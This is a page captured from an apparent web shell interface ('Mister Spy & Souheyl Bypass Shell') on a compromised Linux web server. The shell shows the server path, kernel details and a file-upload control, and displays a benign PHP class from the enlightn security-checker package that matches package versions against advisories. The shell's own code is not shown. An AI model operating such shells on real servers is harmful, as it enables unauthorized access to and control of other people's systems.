Welcome To Our Shell

Mister Spy & Souheyl Bypass Shell

Current Path : /var/www/html/vendor/enlightn/security-checker/src/

Linux ift1.ift-informatik.de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Upload File :
Current File : /var/www/html/vendor/enlightn/security-checker/src/AdvisoryAnalyzer.php

<?php

namespace Enlightn\SecurityChecker;

class AdvisoryAnalyzer
{
    /**
     * @var array
     */
    private $advisories;

    public function __construct($advisories)
    {
        $this->advisories = $advisories;
    }

    /**
     * Returns an array of vulnerabilities for the given package and version.
     *
     * @param string $package
     * @param string $version
     * @param string|null|int $time
     * @return array
     */
    public function analyzeDependency($package, $version, $time = null)
    {
        if (! isset($this->advisories[$package])) {
            return [];
        }

        $vulnerabilities = [];

        if (is_string($time)) {
            $time = strtotime($time) ?: null;
        }

        foreach ($this->advisories[$package] as $advisory) {
            $packageBranchName = $this->normalizeVersion($version);

            foreach ($advisory['branches'] as $branch => $versionInfo) {
                if ($this->isDevPackage($version)) {
                    $branchName = preg_replace('/.x$/', '', $branch);

                    if ($branchName !== $packageBranchName) {
                        continue;
                    }

                    if (is_null($time) || is_null($versionInfo['time']) || $time > $versionInfo['time']) {
                        continue;
                    }
                } else {
                    $passed = false;

                    foreach ($versionInfo['versions'] as $versionConstraint) {
                        $constrainedVersion = str_replace(['>', '<', '='], '', $versionConstraint);
                        $operator = str_replace($constrainedVersion, '', $versionConstraint) ?: '=';

                        if (version_compare($version, $constrainedVersion, $operator)) {
                            continue;
                        } else {
                            $passed = true;

                            break;
                        }
                    }

                    if ($passed) {
                        continue;
                    }
                }

                $vulnerabilities[] = [
                    'title' => isset($advisory['title']) ? $advisory['title'] : null,
                    'link' => isset($advisory['link']) ? $advisory['link'] : null,
                    'cve' => isset($advisory['cve']) ? $advisory['cve'] : null,
                ];
            }
        }

        return $vulnerabilities;
    }

    public function analyzeDependencies($dependencies)
    {
        $vulnerabilities = [];

        foreach ($dependencies as $package => $versionInfo) {
            $advisories = $this->analyzeDependency($package, $versionInfo['version'], $versionInfo['time']);

            if (! empty($advisories)) {
                $vulnerabilities[$package] = [
                    'version' => $versionInfo['version'],
                    'time' => $versionInfo['time'],
                    'advisories' => $advisories,
                ];
            }
        }

        return $vulnerabilities;
    }

    protected function normalizeVersion($version)
    {
        return preg_replace(['/-dev$/', '/^dev-/'], '', $version);
    }

    protected function isDevPackage($version)
    {
        return ! is_null(preg_filter(['/-dev$/', '/^dev-/'], '', $version));
    }
}

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped) Email: contact@elmoujehidin.net